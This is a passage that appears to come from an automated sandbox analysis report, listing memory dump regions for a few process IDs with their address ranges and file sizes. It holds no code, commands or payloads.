                                                  • memory/1808-437-0x00007FFEFAE30000-0x00007FFEFAE53000-memory.dmp

                                                    Filesize

                                                    140KB

                                                  • memory/1808-290-0x0000018C86EB0000-0x0000018C873D0000-memory.dmp

                                                    Filesize

                                                    5.1MB

                                                  • memory/1808-100-0x00007FFEFAE30000-0x00007FFEFAE53000-memory.dmp

                                                    Filesize

                                                    140KB

                                                  • memory/1808-182-0x00007FFEFB4E0000-0x00007FFEFB4F9000-memory.dmp

                                                    Filesize

                                                    100KB

                                                  • memory/1808-25-0x00007FFEEBD00000-0x00007FFEEC2E9000-memory.dmp

                                                    Filesize

                                                    5.9MB

                                                  • memory/1808-293-0x00007FFEFE930000-0x00007FFEFE953000-memory.dmp

                                                    Filesize

                                                    140KB

                                                  • memory/1808-298-0x00007FFEEBB80000-0x00007FFEEBCF7000-memory.dmp

                                                    Filesize

                                                    1.5MB

                                                  • memory/1808-292-0x00007FFEEBD00000-0x00007FFEEC2E9000-memory.dmp

                                                    Filesize

                                                    5.9MB

                                                  • memory/1808-327-0x00007FFEEBD00000-0x00007FFEEC2E9000-memory.dmp

                                                    Filesize

                                                    5.9MB

                                                  • memory/1808-441-0x00007FFEFADF0000-0x00007FFEFAE23000-memory.dmp

                                                    Filesize

                                                    204KB

                                                  • memory/1808-440-0x00007FFF045F0000-0x00007FFF045FD000-memory.dmp

                                                    Filesize

                                                    52KB

                                                  • memory/1808-56-0x00007FFF045F0000-0x00007FFF045FD000-memory.dmp

                                                    Filesize

                                                    52KB

                                                  • memory/1808-445-0x00007FFEFF140000-0x00007FFEFF14D000-memory.dmp

                                                    Filesize

                                                    52KB

                                                  • memory/1808-444-0x00007FFEFAFE0000-0x00007FFEFAFF4000-memory.dmp

                                                    Filesize

                                                    80KB

                                                  • memory/1808-443-0x00007FFEEBAB0000-0x00007FFEEBB7D000-memory.dmp

                                                    Filesize

                                                    820KB

                                                  • memory/1808-442-0x00007FFEEB590000-0x00007FFEEBAB0000-memory.dmp

                                                    Filesize

                                                    5.1MB

                                                  • memory/1808-439-0x00007FFEFB4E0000-0x00007FFEFB4F9000-memory.dmp

                                                    Filesize

                                                    100KB

                                                  • memory/1808-438-0x00007FFEEBB80000-0x00007FFEEBCF7000-memory.dmp

                                                    Filesize

                                                    1.5MB

                                                  • memory/1808-30-0x00007FFEFE930000-0x00007FFEFE953000-memory.dmp

                                                    Filesize

                                                    140KB

                                                  • memory/1808-436-0x00007FFEFB5A0000-0x00007FFEFB5B9000-memory.dmp

                                                    Filesize

                                                    100KB

                                                  • memory/1808-435-0x00007FFEFB500000-0x00007FFEFB52D000-memory.dmp

                                                    Filesize

                                                    180KB

                                                  • memory/1808-434-0x00007FFF048D0000-0x00007FFF048DF000-memory.dmp

                                                    Filesize

                                                    60KB

                                                  • memory/4476-90-0x000001964C7F0000-0x000001964C812000-memory.dmp

                                                    Filesize

                                                    136KB

                                                  • memory/4640-197-0x000001A654C70000-0x000001A654C78000-memory.dmp

                                                    Filesize

                                                    32KB